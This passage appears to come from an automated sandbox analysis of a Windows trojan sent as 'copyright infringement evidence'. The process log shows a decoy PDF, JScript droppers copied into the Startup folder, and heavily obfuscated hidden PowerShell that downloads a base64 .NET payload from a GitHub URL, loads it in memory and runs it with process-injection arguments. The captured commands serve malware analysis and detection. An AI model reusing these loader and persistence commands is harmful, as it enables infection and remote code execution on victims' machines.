Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C8AB0 0_2_00007FF7A18C8AB0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D32A0 0_2_00007FF7A18D32A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A185C2F0 0_2_00007FF7A185C2F0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17D8310 0_2_00007FF7A17D8310
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CFB00 0_2_00007FF7A18CFB00
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17FC310 0_2_00007FF7A17FC310
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17D7230 0_2_00007FF7A17D7230
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1816A40 0_2_00007FF7A1816A40
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C4260 0_2_00007FF7A18C4260
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C81F0 0_2_00007FF7A17C81F0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C2A00 0_2_00007FF7A18C2A00
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C8CA0 0_2_00007FF7A17C8CA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18234B0 0_2_00007FF7A18234B0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D14A0 0_2_00007FF7A18D14A0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1784CC5 0_2_00007FF7A1784CC5
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CECC0 0_2_00007FF7A18CECC0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1815CF0 0_2_00007FF7A1815CF0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17CB440 0_2_00007FF7A17CB440
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CA440 0_2_00007FF7A18CA440
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17933B2 0_2_00007FF7A17933B2
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1832370 0_2_00007FF7A1832370
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1789EA0 0_2_00007FF7A1789EA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18C96D0 0_2_00007FF7A18C96D0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A182E650 0_2_00007FF7A182E650
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1816690 0_2_00007FF7A1816690
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A1868E90 0_2_00007FF7A1868E90
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CDE80 0_2_00007FF7A18CDE80
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C7E10 0_2_00007FF7A17C7E10
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CE570 0_2_00007FF7A18CE570
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18BF580 0_2_00007FF7A18BF580
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C88E0 0_2_00007FF7A17C88E0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18D8830 0_2_00007FF7A18D8830
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18A6060 0_2_00007FF7A18A6060
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A17C8070 0_2_00007FF7A17C8070
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CB060 0_2_00007FF7A18CB060
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A18CBFA0 0_2_00007FF7A18CBFA0
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: 0_2_00007FF7A181AF70 0_2_00007FF7A181AF70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 29_2_00007FF83B9B3292 29_2_00007FF83B9B3292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 30_2_00007FF83B993292 30_2_00007FF83B993292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 43_2_00007FF83B993292 43_2_00007FF83B993292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF83B9B3292 45_2_00007FF83B9B3292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 53_2_00007FF83B983292 53_2_00007FF83B983292
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: String function: 00007FF7A18D8F30 appears 121 times
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Code function: String function: 00007FF7A18D9030 appears 104 times
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 3049
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 2817
Source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1784, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8824, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@99/86@0/6
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe File created: C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8636:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-07 20-15-05-350.log
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
Source: copyright_infringement_evidence_1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\cmd.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: copyright_infringement_evidence_1.exe Virustotal: Detection: 15%
Source: unknown Process created: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe "C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,2238789325032490654,13057371531959611122,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2p_bee.js
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\wscript.exe "wscript.exe" C:\Users\Public\Documents\2x_bee.js
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exe Process created: C:\Windows\System32\cmd.exe "cmd" /C echo %username%
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2p_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Fromba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = 